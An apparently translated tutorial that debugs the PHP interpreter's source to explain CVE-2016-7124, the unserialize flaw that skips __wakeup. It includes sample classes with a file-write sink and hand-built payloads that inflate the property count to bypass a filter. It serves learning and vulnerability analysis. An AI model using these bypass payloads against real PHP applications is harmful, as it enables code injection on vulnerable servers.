Preface
While learning PHP, I found some of its behaviors hard to understand, such as 00 (null byte) truncation, MD5 flaws, and bypassing __wakeup during deserialization. I did not want to stop at a superficial understanding; I wanted to explore how the PHP core actually handles them.
The following takes a deserialization vulnerability that is common in CTFs, CVE-2016-7124 (bypassing the magic function __wakeup), as an example to share the process of debugging the PHP kernel. It covers everything from setting up a debugging environment for the kernel source code, through analysis of the serialization and deserialization source code, to the final vulnerability analysis.
1. Thoughts triggered by an example
We can first look at the small example I wrote.
Based on the example above, we first introduce the magic functions in PHP, starting with how the official documentation describes several commonly used ones:
In brief: when a class is instantiated, __construct is called, and when the instance is destroyed, __destruct is called.
When an object is serialized with serialize, its __sleep function is called automatically. When a string is deserialized back into an object with unserialize, the __wakeup function is called. If these magic functions exist, they are called automatically; there is no need to call them explicitly.
Now look back at the code from the beginning. The __destruct function performs a sensitive operation: it writes a file. By constructing a malicious string and deserializing it, we may be able to turn this into a code execution vulnerability.
However, when we construct the string and try to use it, we find a filtering operation in the __wakeup function that gets in the way, because deserialization calls __wakeup first.
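The original listing is not available here, so the following is only a hypothetical reconstruction of that kind of class. The class name Logger, the property name content, and the filter rule are all assumptions, and a static array stands in for the file write so the sketch has no side effects.

```php
<?php
// Hypothetical reconstruction: names and filter logic are assumptions.
class Logger
{
    public static $written = [];   // stands in for the file system
    public $content = '';

    public function __wakeup()
    {
        // Filter: strip anything that looks like a PHP open tag.
        $this->content = str_replace('<?', '', $this->content);
    }

    public function __destruct()
    {
        // Sensitive operation: in the article's example this is a file write.
        self::$written[] = $this->content;
    }
}

// Attacker-controlled serialized string, built by hand.
$code    = '<?php phpinfo();';
$payload = sprintf('O:6:"Logger":1:{s:7:"content";s:%d:"%s";}', strlen($code), $code);

$obj = unserialize($payload);   // __wakeup runs first and filters the content
unset($obj);                    // __destruct then "writes" the filtered content

var_dump(Logger::$written);
```

With a well-formed payload the filter in __wakeup always runs before __destruct, so the open tag never reaches the sink. That is the obstacle the rest of the article works around.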
This is where the PHP deserialization vulnerability CVE-2016-7124 (bypassing the magic function __wakeup) comes to mind: it lets us skip the __wakeup call that deserialization would otherwise make automatically, so the sensitive content gets written to the file.
Of course, the code above is just a simple example of my own, and similar situations are common in real code. But this bypass intrigues me. How does PHP's internal processing affect the upper-level code logic so as to produce such a strange result (a bug)? Next, I will explore this question through dynamic debugging of the PHP kernel.
This vulnerability (CVE-2016-7124) affects the PHP 5 series before 5.6.25 and the 7.x series before 7.0.10. So we will compile two versions later: 7.3.0, which is not affected, and 5.6.10, where the vulnerability exists. Comparing the two versions shows the differences in detail.
2. Setting up the PHP source code debugging environment
PHP is written in C. Because my environment is Windows 10, this section mainly covers setting up the environment on Windows. We need the following:
PHP source code
PHP SDK toolkit, used to build PHP
An IDE for debugging
The source code can be downloaded from GitHub at https://github.com/php/php-src; select the version you need.
The PHP SDK toolkit can be downloaded from https://github.com/Microsoft/php-sdk-binary-tools. The toolkit from this address only supports VC14 and VC15. For lower versions of PHP, VC11, VC12, and so on can be found at https://windows.php.net/downloads/. Before using the PHP SDK, make sure Visual Studio is installed with the matching version of the Windows SDK component.
The rest of this article uses PHP 7.3.0 and 5.6.10. Compiling these two versions from source is described below; the method for other versions is similar.
2.1 Compile Windows PHP 7.3.0
The local environment is Windows 10 x64, and the PHP SDK is downloaded from the GitHub link above. Enter the SDK directory, where you will find 4 batch files, and double-click phpsdk-vc15-x64.
Then enter phpsdk_buildtree php7 in this shell. A php7 folder appears in the same directory, and the shell's working directory changes as well.
Then we put the decompressed source code under \php7\vc15\x64. In the shell, enter this folder and run phpsdk_deps --update --branch master to update and download the dependent components.
After it completes, enter the source code directory and double-click the buildconf.bat batch file. It generates two files, configure.bat and configure.js. Run configure --disable-all --enable-cli --enable-debug --enable-phar in the shell to set the compilation options. If you have other needs, run configure --help to see the available options.
As the prompt indicates, run nmake to compile.
When compilation completes, the executable is in the php7\vc15\x64\php-src\x64\Debug_TS folder. We can run php -v there to view the version information.
2.2 Compile Windows PHP 5.6.10
The method is the same as for 7.3.0, with one difference: PHP 5.6 uses the VC11 Windows SDK component, so you need VS2012 and cannot use the PHP SDK downloaded from GitHub. Instead, select the VC11 PHP SDK and the related dependent components from https://windows.php.net/downloads/. The rest is exactly the same as above and is not repeated here.
2.3 Debugging configuration
Because we have already compiled the PHP interpreter, we can use VS Code directly for debugging.
After downloading VS Code, install the C/C++ debugging extension.
Then open the source code directory, click Debug -> Open Configuration, the launch.json file will open.
After configuring the three parameters shown in the figure above, you can write PHP code in 1.php in the current directory and set breakpoints in the PHP source code to debug directly.
The debugging environment is set up.
3. PHP deserialization source code analysis
PHP deserialization usually involves two functions that appear as a pair, serialize and unserialize, although they do not have to be used together. There are also two magic methods, __sleep() and __wakeup(). Put simply, serialization converts an object into a string that can be stored, for example in a file, and deserialization does the opposite: the string is read back and turned into an object instance.
Next, using the debugging environment set up above, we use dynamic debugging to see directly what PHP (version 7.3.0) does during serialization and deserialization.
3.1 serialize source code analysis
Let's first write a simple Demo that does not contain the __sleep magic function:
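The original Demo listing is not available, so here is a minimal stand-in. The class name Demo and its two properties are assumptions chosen for illustration.

```php
<?php
// Hypothetical stand-in for the article's Demo: a class without __sleep.
class Demo
{
    public $x = 1;
    public $y = 'abc';
}

echo serialize(new Demo()), PHP_EOL;
// O:4:"Demo":2:{s:1:"x";i:1;s:1:"y";s:3:"abc";}
```

The output reads as: an object (O) whose class name has 4 characters, with 2 properties, followed by name/value pairs where each value carries its own type tag.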
Then we search the source code globally for the serialize function and locate it in the var.c file. We set a breakpoint directly at the function header and start debugging.
We can see that after some preparation work, execution enters the serialization routine, so we step into the php_var_serialize function.
We continue into the php_var_serialize_intern function, which is the main processing function and is also in the var.c file. Because the function is long, only the key part is shown here.
The whole function is structured as a switch statement. The macro Z_TYPE_P (which expands to struc->u1.v.type) reads the type of the struc variable to determine what is being serialized, and execution then enters the corresponding case. The figure below shows the type definitions.
From the value 8 in the red box above, we know that the value to serialize is an object (IS_OBJECT), so we enter the corresponding case branch:
The picture above shows when the magic function __sleep is called. Because this function does not exist in the Demo we wrote, execution does not enter this branch. Different branches represent different processing flows. We will look at the flow with the magic function __sleep later.
Because nothing in the IS_OBJECT case is hit and the case has no break statement, execution falls through into the IS_ARRAY branch. Here the class name is extracted from the struc structure, its length is calculated, and both are written to the buf structure. The properties of the object that need to be serialized are extracted and stored in a hash array.
The next step calls php_var_serialize_intern recursively over the whole hash array, extracting each variable name and value, formatting them, and appending the resulting string to the buf structure. When the whole process completes, the entire string is stored in the flexible array structure buf.
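To make the recursive structure concrete, here is a toy re-implementation of the text format written in PHP. It is not the engine's C code: the function name toy_serialize and the class Point are hypothetical, and the sketch only covers null, bool, int, string, array, and objects with public properties.

```php
<?php
// Toy model of the serialization format; NOT the engine's implementation.
function toy_serialize($value)
{
    if ($value === null)   { return 'N;'; }
    if (is_bool($value))   { return 'b:' . ($value ? 1 : 0) . ';'; }
    if (is_int($value))    { return 'i:' . $value . ';'; }
    if (is_string($value)) { return 's:' . strlen($value) . ':"' . $value . '";'; }

    if (is_array($value) || is_object($value)) {
        // Objects emit a class-name header and then reuse the array path,
        // mirroring the IS_OBJECT -> IS_ARRAY fall-through described above.
        $props  = is_object($value) ? get_object_vars($value) : $value;
        $header = is_object($value)
            ? 'O:' . strlen(get_class($value)) . ':"' . get_class($value) . '":'
            : 'a:';
        $body = '';
        foreach ($props as $key => $item) {
            $body .= toy_serialize($key) . toy_serialize($item);   // recursion
        }
        return $header . count($props) . ':{' . $body . '}';
    }

    throw new InvalidArgumentException('type not covered by this sketch');
}

// Hypothetical class with a nested array, to exercise the recursion.
class Point
{
    public $x = 1;
    public $y = [true, 'ab'];
}

$p = new Point();
echo toy_serialize($p), PHP_EOL;
var_dump(toy_serialize($p) === serialize($p));
```

For the value types it covers, the sketch produces the same string as the built-in serialize, which makes the roles of the class-name header, the element count, and the recursive key/value pairs easy to see.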
The red box in the picture above shows that this matches the final result. Now let's modify the Demo slightly and add the magic function __sleep. According to the official documentation, the __sleep function must return an array. We also call a class member function inside it, so that we can observe its behavior.
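A minimal sketch of such a modified Demo follows. The class name DemoSleep, the counter, and the choice to return only x are assumptions; the member function is named show to match the text.

```php
<?php
// Hypothetical stand-in for the modified Demo: __sleep calls a member function
// and returns the names of the properties that should be serialized.
class DemoSleep
{
    public static $calls = 0;
    public $x = 1;
    public $y = 'abc';

    public function show()
    {
        self::$calls++;   // user code that runs during serialization
    }

    public function __sleep()
    {
        $this->show();
        return ['x'];     // only $x ends up in the output
    }
}

echo serialize(new DemoSleep()), PHP_EOL;
// O:9:"DemoSleep":1:{s:1:"x";i:1;}
```

Because __sleep returns only x, the property y is omitted and the element count in the output is 1.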
The earlier part of the flow is exactly the same and is not repeated here. Let's start from the branch point.
We step directly into the php_var_serialize_call_sleep function.
We continue into call_user_function here. According to the macro definition, it actually calls the _call_user_function_ex function. That function only performs some copying, so no screenshot is shown. Execution then proceeds to the call to zend_call_function.
In practice, __sleep usually contains code of our own. In zend_call_function, PHP pushes the operations to be performed onto the stack of its own zend_vm engine, where they are handled one by one later (that is, the corresponding OPCODEs are executed).
Execution hits this branch, and we step into the zend_execute_ex function.
Here we can see that the overall processing flow in ZEND_VM is a while(1) loop that keeps handling the operations on the ZEND_VM stack. As the red box in the figure above shows, the ZEND_VM engine dispatches to the corresponding handler using ZEND_FASTCALL.
Because we called the member function show in __sleep, the engine first locates show. Its operations are then pushed onto the ZEND_VM stack for another round of handling (this time the operations inside show), until everything has been processed. We will not follow this any further here.
Remember the output parameter retval mentioned above? It holds the return value of __sleep. The picture above shows x, the first element of the returned array. You can of course also inspect it directly in the variables view.
After this long detour, both paths arrive at the same place. Once the operations in the __sleep function have been processed, the php_var_serialize_class function serializes the class name and recursively serializes the properties named in the return value of __sleep. Finally, the result is stored in the buf structure. At this point, the whole serialization process is complete.
3.1.1 Summary of serialize process
To summarize the serialization process:
When there is no magic function: serialize the class name -> recursively serialize the remaining structure.
When there is a magic function: call the magic function __sleep -> use the ZEND_VM engine to execute the PHP operations -> return the array naming the properties to serialize -> serialize the class name -> recursively serialize the properties named in the return value of __sleep.
3.2 unserialize source code analysis
Having gone through the serialize process, we now look at the unserialize process, again starting from the simplest Demo. This example does not contain magic functions.
The method is the same as above. The unserialize source code is also in the var.c file.
The picture above involves a feature introduced in PHP 7: filtered deserialization. The allowed_classes option filters which PHP classes may be instantiated, to prevent illegal data injection. A filtered object is converted into a __PHP_Incomplete_Class object, which cannot be used directly. This has no effect on the deserialization flow itself, so it is not discussed in detail here. We step into the php_var_unserialize function.
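A short sketch of the filtering behavior, using the documented second parameter of unserialize. The class names Allowed and Blocked are hypothetical.

```php
<?php
// Hypothetical classes: only one of them is on the allow list.
class Allowed { public $v = 1; }
class Blocked { public $v = 2; }

$data = serialize([new Allowed(), new Blocked()]);

// Only classes named in allowed_classes are instantiated as themselves.
$out = unserialize($data, ['allowed_classes' => ['Allowed']]);

echo get_class($out[0]), PHP_EOL;   // Allowed
echo get_class($out[1]), PHP_EOL;   // __PHP_Incomplete_Class
```

Passing ['allowed_classes' => false] rejects every class, so all objects in the input come back as __PHP_Incomplete_Class.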
We then follow the php_var_unserialize_internal function.
Execution next reaches the object_common2 function.
Control finally returns to PHP_FUNCTION. There is some finishing work left: the allocated space is released, and deserialization is complete. Our magic function __wakeup is not called here. To find out when __wakeup is called, we modify the Demo.
Execution then reaches PHP_VAR_UNSERIALIZE_DESTROY, which releases the space.
Remember the VAR_WAKEUP_FLAG flag that is set when __wakeup is found during deserialization? Here, while traversing the var_dtor_hash array, the engine encounters this flag and the call to __wakeup actually begins. The call itself works exactly like the __sleep call described earlier and is not repeated here. At this point, the whole deserialization process is complete.
3.2.1 Summary of the unserialize process
As we can see from the above, unlike serialization, the deserialization flow does not branch on whether a magic function is present. The unserialize process is as follows:
Get the string to deserialize -> deserialize according to the type -> look up the table to find the corresponding class -> determine the number of elements from the string -> create a new instance -> iteratively parse the remaining string -> check whether the magic function __wakeup exists and mark it -> release the space and check for the mark -> make the call.
4. PHP Deserialization Vulnerability
With the source code groundwork above, let's now explore the vulnerability CVE-2016-7124 (bypassing the magic function __wakeup).
As noted earlier, the vulnerability only exists in certain versions, so we use the other PHP version compiled above (5.6.10) to reproduce and debug it.
First we reproduce the vulnerability:
Here the TEST class contains only one property, $a. If, when deserializing, we change the value in the serialized string that represents the number of properties, the vulnerability is triggered and the call to the magic function __wakeup is skipped.
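The payload construction can be sketched as follows. The class body is an assumption (the original listing is not available); only the class name TEST and the single property $a come from the text. The sketch records which hooks ran rather than asserting a result, because the outcome depends on the PHP version it runs on.

```php
<?php
// Hypothetical TEST class: one property, hooks recorded in a static log.
class TEST
{
    public static $log = [];
    public $a = 'abc';

    public function __wakeup()   { self::$log[] = '__wakeup'; }
    public function __destruct() { self::$log[] = '__destruct'; }
}

// A well-formed string for TEST, with a declared property count of 1.
$valid = 'O:4:"TEST":1:{s:1:"a";s:3:"abc";}';

// Raise the declared count from 1 to 2 without adding a second property.
$payload = str_replace('":1:{', '":2:{', $valid);
echo $payload, PHP_EOL;

// The string is now malformed, so errors are suppressed and unserialize is
// expected to fail. What matters is which hooks ran along the way.
$result = @unserialize($payload);
unset($result);

printf("PHP %s, hooks run: [%s]\n", PHP_VERSION, implode(', ', TEST::$log));
```

According to the analysis in this article, an affected version such as 5.6.10 runs __destruct without __wakeup here. Patched versions behave differently, which is why the sketch prints the log instead of hard-coding an expectation.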
Of course, an interesting phenomenon was also discovered during the process of triggering the vulnerability. This is not the only triggering method.
The deserialization operations for all four payloads in the picture above trigger this vulnerability. Although all four trigger it, there are some minor differences. Here we slightly modify the code:
From the figure above we can see that the vulnerability is triggered whenever an error occurs while parsing the class's properties in the serialized string. However, tampering with a property's own encoding (for example, changing the string length or the variable type, as in the figure above) causes the assignment of that member variable to fail. Only changing the number of members (to a value larger than the real number) guarantees that the members are still assigned successfully.
Let’s look at the problem through debugging:
Based on our analysis of the deserialization source code in part 3, we guess that the problem occurs at the end, when the variables are parsed. Here we go straight to the debugger:
Compared with the source code of version 7.3.0, this version has no filter parameter. After so many versions of iteration, the processing in the lower version now looks relatively simple, but the overall logic has not changed. We step directly into the php_var_unserialize function. The parts that work the same way are not repeated. We go straight to the difference, the object_common2 function, which is the code that handles the member variables of the class.
The function object_common2 performs two main operations: process_nested_data iteratively parses the data in the class, and then the magic function __wakeup is called. When process_nested_data fails to parse, object_common2 returns 0 immediately, so the subsequent __wakeup call never gets a chance to run.
This explains why there is more than one payload that triggers the vulnerability.
When only the number of class members is modified, the while loop completes one full iteration, so the member variable in our class is fully assigned. When the encoding of a member variable itself is modified, the php_var_unserialize call fails, and zval_dtor and FREE_ZVAL are then called to release the current key (variable), so the assignment of that class variable fails.
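The control flow described above can be modeled with a toy sketch in PHP. It is not the engine's C code: the function names, the pre-tokenised input, and the state array are all assumptions used to show why an inflated count keeps the assigned members while a broken member does not.

```php
<?php
// Toy model of the PHP 5.6 control flow described above; NOT the engine's code.
// $members is a pre-tokenised list: ['name', value] for a well-formed member,
// or null for one whose encoding is broken (wrong length, wrong type tag, ...).
function toy_process_nested_data(array &$props, $declared, array $members)
{
    $i = 0;
    while ($declared-- > 0) {
        if (!isset($members[$i])) {   // missing or malformed entry
            return false;             // members assigned so far are kept
        }
        list($name, $value) = $members[$i++];
        $props[$name] = $value;
    }
    return true;
}

function toy_object_common2($declared, array $members)
{
    $state = ['props' => [], 'wakeup_called' => false];
    if (!toy_process_nested_data($state['props'], $declared, $members)) {
        return $state;                // early return: __wakeup is skipped
    }
    $state['wakeup_called'] = true;   // stands in for the call to __wakeup
    return $state;
}

$normal   = toy_object_common2(1, [['a', 'abc']]);   // well-formed input
$inflated = toy_object_common2(2, [['a', 'abc']]);   // count raised from 1 to 2
$broken   = toy_object_common2(1, [null]);           // the member itself is malformed

var_dump($normal, $inflated, $broken);
```

In this model the inflated count fails only on the second iteration, after $a has already been assigned, so the object keeps its data while the wakeup step is skipped. The broken member fails on the first iteration and leaves nothing assigned.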
By contrast, PHP 7.3.0 does not call __wakeup at this point. It only sets a flag, and the actual call to the magic function is moved to the point where the data is released. This avoids the bypass. The vulnerability appears to stem from a logic flaw.